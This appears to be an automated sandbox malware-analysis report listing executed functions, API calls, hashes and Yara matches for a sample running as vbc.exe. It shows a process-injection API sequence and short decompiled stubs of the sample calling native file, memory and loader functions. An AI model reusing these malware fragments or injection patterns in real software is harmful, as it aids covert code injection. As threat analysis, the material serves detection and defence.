API String ID: 963392458-0
Opcode ID: 5449e98ffc6ea2b0943707b78941e0e0ab8bbe935fcd848c4293103c5eca37fb
Instruction ID: 6468bd76bc5129ae7898eb0125ca372d2f4425a6a7a8334b8b2b4fea8ea6783e
Opcode Fuzzy Hash: 5449e98ffc6ea2b0943707b78941e0e0ab8bbe935fcd848c4293103c5eca37fb
Instruction Fuzzy Hash: 3981C074D00229DFDF24CFA4C940BEEBBB5AF09304F1095AAE509B7250DB349A89CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0049FBA0, Relevance: 1.6, APIs: 1, Instructions: 112injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0049FC76

Memory Dump Source

Source File: 00000004.00000002.2135487213.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e0eec81a90b8839cc5ea2e19c9f76a7b18de17cf6582ed84ba7396f8ba919259
Instruction ID: 6047bf71008d25908b463f9186576997f6e936427a1430ec2095fd55f08a86ce
Opcode Fuzzy Hash: e0eec81a90b8839cc5ea2e19c9f76a7b18de17cf6582ed84ba7396f8ba919259
Instruction Fuzzy Hash: 944168B5D012589FCF10CFA9D984ADEFBF1BB49314F24942AE818B7310D375AA45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0049F970, Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0049FA25

Memory Dump Source

Source File: 00000004.00000002.2135487213.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: d1e3bf35e4a198d4c431803a1025966515a5b6ff8ad123ce92a5e819ea510b12
Instruction ID: e1d438c9ff06559d81ebe53309c9ff6087ea4e2ef5ce8956e2711d159132b9f6
Opcode Fuzzy Hash: d1e3bf35e4a198d4c431803a1025966515a5b6ff8ad123ce92a5e819ea510b12
Instruction Fuzzy Hash: C74177B9D04258DFCF10CFA9D984ADEFBB5BB19310F10A42AE818B7210D375AA45CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0049FA90, Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0049FB3D

Memory Dump Source

Source File: 00000004.00000002.2135487213.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 66b1ab58c3e36f8c1f5e89f50b4089d912e86ac21d7d042bcdd476b1a7cae562
Instruction ID: 47f18dd5d0015b2626cb3e41b591baddbe97e714bae4702de73eab8be2913d2e
Opcode Fuzzy Hash: 66b1ab58c3e36f8c1f5e89f50b4089d912e86ac21d7d042bcdd476b1a7cae562
Instruction Fuzzy Hash: 523166B8D04258DFCF10CFA9D884A9EFBB5BB59310F10A42AE818B7310D375A946CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0049F858, Relevance: 1.6, APIs: 1, Instructions: 90threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0049F90A

Memory Dump Source

Source File: 00000004.00000002.2135487213.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 75fd86e69b9c8067da7d8a11887c67e8ffa3144e98ecbd90196012498b348553
Instruction ID: 18d295953ea70a8e3aeaf6765835a9a33170e3c669020c80ff5a8447fb9d0913
Opcode Fuzzy Hash: 75fd86e69b9c8067da7d8a11887c67e8ffa3144e98ecbd90196012498b348553
Instruction Fuzzy Hash: A13179B5D012589FCB10CFA9D884ADEFBF1BB49314F24942AE414B7210D778AA45CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0049FCE8, Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0049FD66

Memory Dump Source

Source File: 00000004.00000002.2135487213.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a5c4ec8fa314480488710f5974d9a9d7bbf172f7e41a6ba1eeb950f4f2a77dfd
Instruction ID: 0d620ad31de8dd65aff653084ce6ade95389adc4daa258619e77bf568eef0c84
Opcode Fuzzy Hash: a5c4ec8fa314480488710f5974d9a9d7bbf172f7e41a6ba1eeb950f4f2a77dfd
Instruction Fuzzy Hash: ED2178B8D002189FCB10CFA9D884ADEFBF4AB49314F24946AE819B7310D375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0010D1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2134669334.000000000010D000.00000040.00000001.sdmp, Offset: 0010D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 370469e2e3fe1274333985d05f15dea31f9bf030e0d6d5568fc53c57c1817834
Instruction ID: 9700d88bdce2b575e5957bfaf497b3264f07d0e17e1190bde38a172b6256cca5
Opcode Fuzzy Hash: 370469e2e3fe1274333985d05f15dea31f9bf030e0d6d5568fc53c57c1817834
Instruction Fuzzy Hash: D6212971604304EFDB05DF94E9C0B26BBA5FB84314F20C96DE8894B286C776D846CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0010D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2134669334.000000000010D000.00000040.00000001.sdmp, Offset: 0010D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29eb4ce9519342a7258ea1ebee02337bb69bbec7f1905245020a0aae0ff0c4d4
Instruction ID: 593d4c35b8700658aecc0cff421d005424a78b3238b4e92696aa7c363b94ed3d
Opcode Fuzzy Hash: 29eb4ce9519342a7258ea1ebee02337bb69bbec7f1905245020a0aae0ff0c4d4
Instruction Fuzzy Hash: 9A210775604244DFDB14DF94E884B16BBA5FB84324F30C969E88D4B28AC777D847CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0010D017, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2134669334.000000000010D000.00000040.00000001.sdmp, Offset: 0010D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 947bb96a6b71b5d16c5063f02afef5b667bb5e64fad4aea3c58dd9afdd909a92
Instruction ID: 68050a8012489442d0a8394fd34beab80e1092bc662752c55c86f260f999e652
Opcode Fuzzy Hash: 947bb96a6b71b5d16c5063f02afef5b667bb5e64fad4aea3c58dd9afdd909a92
Instruction Fuzzy Hash: 6011BE75504280CFCB11CF50E584B15BB61FB44314F24C6A9E8494B69AC37AD80ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0010D1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2134669334.000000000010D000.00000040.00000001.sdmp, Offset: 0010D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 947bb96a6b71b5d16c5063f02afef5b667bb5e64fad4aea3c58dd9afdd909a92
Instruction ID: 60cf93a8669fd3fd5906d9938845b591db8caf86ccaf942f283dcdf457f7c93a
Opcode Fuzzy Hash: 947bb96a6b71b5d16c5063f02afef5b667bb5e64fad4aea3c58dd9afdd909a92
Instruction Fuzzy Hash: E411BB75504280DFCB02CF54E5C4B15BBA1FB84314F24C6A9D8494B696C37AD80ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 000FD211, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2134638522.00000000000FD000.00000040.00000001.sdmp, Offset: 000FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da3d5437acdf370e765106409e88ab603b7029e8a92c3d4b7323c1dedb4d0ee9
Instruction ID: fded771994d4c10f1e6bed745d5425b73a7c65fd9bfd0b1af704924ee034c00a
Opcode Fuzzy Hash: da3d5437acdf370e765106409e88ab603b7029e8a92c3d4b7323c1dedb4d0ee9
Instruction Fuzzy Hash: 0F018471408348DADBE09A55C884B77BBD9EF61324F18881BDE091B682C378DD40E6F1

Uniqueness

Uniqueness Score: -1.00%

Function 000FD210, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2134638522.00000000000FD000.00000040.00000001.sdmp, Offset: 000FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 382fb5c4deea6a498bb3a8d47eed07a203ca44dd11709f138c27e826504ead69
Instruction ID: 92af5164f2719c08152b04143f0a93a0ac2a8f947deac40eb34217b050b56407
Opcode Fuzzy Hash: 382fb5c4deea6a498bb3a8d47eed07a203ca44dd11709f138c27e826504ead69
Instruction Fuzzy Hash: FDF04F71404248AEEB908A55C888B62FFD9EF61724F18C55AED085B686C278DC44DAA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0049A5C8, Relevance: 8.0, Strings: 5, Instructions: 1798COMMON

Download Yara Rule

Strings

`N%k, xrefs: 0049AA9A
@2?m, xrefs: 0049A69B
TV?m, xrefs: 0049A65D
jrQ(, xrefs: 0049B48F
g, xrefs: 0049B967

Memory Dump Source

Source File: 00000004.00000002.2135487213.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID: g$@2?m$TV?m$`N%k$jrQ(
API String ID: 0-1192167101
Opcode ID: f222c4255f776a0c18dd1ec63b268fa9a9cba7eed6046951ce44c61d4944b763
Instruction ID: 5dd5dd58923156ed07f26cafaabf1fa40d5d2f01abf1c7c232f02e5bed6da750
Opcode Fuzzy Hash: f222c4255f776a0c18dd1ec63b268fa9a9cba7eed6046951ce44c61d4944b763
Instruction Fuzzy Hash: BA03C37A500504EFDB469F94C944E95BBB2FF4D324B0681D8E6095F276CB32E8A1EF50

Uniqueness

Uniqueness Score: -1.00%

Function 0049C6A0, Relevance: 1.4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

}hE, xrefs: 0049C768

Memory Dump Source

Source File: 00000004.00000002.2135487213.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID: }hE
API String ID: 0-2009448932
Opcode ID: 88c8c7beb1c05aad0ce1a1df4f8871bbd7952b8408c77478bf1b52cffd684fa9
Instruction ID: bce28b0a83c5d76fd59a7c9b32bac416590753ea7fee2f033e90808145cf55cc
Opcode Fuzzy Hash: 88c8c7beb1c05aad0ce1a1df4f8871bbd7952b8408c77478bf1b52cffd684fa9
Instruction Fuzzy Hash: E841F7B5E0500AEFDB48DEBAC9801ADBBB1AB88341B64C5768016D7704E73CC9428F49

Uniqueness

Uniqueness Score: -1.00%

Function 00493200, Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

TV?m, xrefs: 004932D9

Memory Dump Source

Source File: 00000004.00000002.2135487213.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID: TV?m
API String ID: 0-1724326450
Opcode ID: cefeb1b0704ce1eb789b14fcdda0bf86baf4882afab1263845e8ce82993f7794
Instruction ID: 3a7273f59811e53fe6fda4ec5f32bc077375ef409f883f8ca8b3da5155c5e95a
Opcode Fuzzy Hash: cefeb1b0704ce1eb789b14fcdda0bf86baf4882afab1263845e8ce82993f7794
Instruction Fuzzy Hash: 0E41DC71D056588BDB28CF6BD9406D9BEF3AFCA301F14C0BAD448AB214DB751A829F45

Uniqueness

Uniqueness Score: -1.00%

Function 00EC7AF1, Relevance: .6, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2135825625.0000000000EC2000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000004.00000002.2135818377.0000000000EC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2135881046.0000000000F38000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d97ad4dacb1d7bb50baafad4cb5404b3997000dcdae3849673db67ec760e5a7
Instruction ID: fe823095b2304ec62d03899af256ff7f235ad96586507bafdce90ee8d419a655
Opcode Fuzzy Hash: 3d97ad4dacb1d7bb50baafad4cb5404b3997000dcdae3849673db67ec760e5a7
Instruction Fuzzy Hash: 8932026244E3D19FD7138B748CA4A927FB0AE53214B5E46EBD0C1CF0A3D2194E5AC7B2

Uniqueness

Uniqueness Score: -1.00%

Function 00494879, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2135487213.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4d8c61f6578d2114b40e3ff2d1bb12792b3bbee52553ce642403c9d3949f8c5
Instruction ID: 161e5283503a6170759a1a7cf430c2c036588e15064a12a78812a5b67cf5a68f
Opcode Fuzzy Hash: c4d8c61f6578d2114b40e3ff2d1bb12792b3bbee52553ce642403c9d3949f8c5
Instruction Fuzzy Hash: 2D113770D056489BEB08CFABC8405AEFFF7AFC9300F54D07AD518A6224DB3449028F69

Uniqueness

Uniqueness Score: -1.00%

Function 00494888, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2135487213.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9e7301853a1a81d000757b29953b68b42702a2c2116ae0c15af38b1c2ae6fab
Instruction ID: 00f720a6cf0d6149ec75714e1494341eb68d7d81f6794d508d98ad9b3e06d187
Opcode Fuzzy Hash: b9e7301853a1a81d000757b29953b68b42702a2c2116ae0c15af38b1c2ae6fab
Instruction Fuzzy Hash: EC11F871E056089BDB08DFABD8405AEFEF7AFC9300F54D03AD919B6224EB3449028F59

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 2828 Parent PID: 532 vbc.exeCOMMON

Executed Functions

Function 00418280, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418280(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DD0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}

0x00418283
0x0041828f
0x00418297
0x0041829c
0x004182a2
0x004182bd
0x004182c5
0x004182c9

APIs

NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5

Strings

b=A, xrefs: 004182A2, 004182B0
b=A, xrefs: 004182BD, 004182C4
!:A, xrefs: 0041829C, 004182A8

Memory Dump Source

Source File: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: !:A$b=A$b=A
API String ID: 2738559852-704622139
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 51f5fae1d88b5840d166f8ea9f31b1482cd02544441b85bb92b9de754d914906
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: F0F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB60( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF80(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B200( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419310(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b4c
0x00409b4f
0x00409b54
0x00409b59
0x00409b63
0x00409b68
0x00409b6b
0x00409b6d
0x00409b75
0x00409b7a
0x00409b7a
0x00409b81
0x00409b89
0x00409b8c
0x00409b8e
0x00409ba2
0x00000000
0x00409ba4
0x00409baa
0x00409b5e
0x00409b5e
0x00409b5e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2

Memory Dump Source

Source File: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 4e6e3ee69d5942d72351b9e79d7f2bfe549f68bd28f2ef5b77caac8f1f18b979
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: BB0152B5E0010DA7DB10DAA1DC42FDEB378AB54308F0041A5E918A7281F635EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181D0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004181D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DD0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004181df
0x004181e7
0x0041821d
0x00418221

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D

Memory Dump Source

Source File: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 4ba06d0811943408d915368c3acdb1aee86cb039c5ce671b45e9a6de03e682c0
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: EAF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004182FB, Relevance: 1.5, APIs: 1, Instructions: 38
nativeCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E004182FB(void* __eax, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20) {
				void* _t10;
				void* _t28;

				asm("aaa");
				_t10 = _t28;
				asm("int3");
				asm("popfd");
				if (__eflags < 0) goto L3;
			}

0x004182fb
0x004182fc
0x004182fd
0x004182fe
0x004182ff

APIs

NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325

Memory Dump Source

Source File: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 6e5385f3a187b0f44ed4faeea80bed83cf58e06526cf8502b74ffd8c24a3bace
Instruction ID: 648073517ec77e7ae8ce9f84143e906328aa6938b1d29cdc5086863b5695eb8c
Opcode Fuzzy Hash: 6e5385f3a187b0f44ed4faeea80bed83cf58e06526cf8502b74ffd8c24a3bace
Instruction Fuzzy Hash: 38F05EB6200218ABD714EF99EC80EEB7769EF88310F14855DBA1C9B281C631E91587A0

Uniqueness

Uniqueness Score: -1.00%

Function 004183B0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004183B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DD0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004183bf
0x004183c7
0x004183e9
0x004183ed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9

Memory Dump Source

Source File: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 5f1ba135279249ad747bfdca3347611d303f78695a7cb9da664d5d0d2719559c
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC81EEB77ADAF88754F118249BE0897281C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418300, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325

Memory Dump Source

Source File: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: e0948211a995ee673693cff6b37ba25287d5fac55aefcf59dfc2265e20a22c74
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: EAD012752003146BD710EF99DC45ED7775CEF44750F154559BA185B282C570F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 009100C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009100CF

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 00910048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00910053

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A

Uniqueness

Uniqueness Score: -1.00%

Function 00910078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00910086

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B

Uniqueness

Uniqueness Score: -1.00%

Function 009107AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009107B7

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 0090F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0090F9FB

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
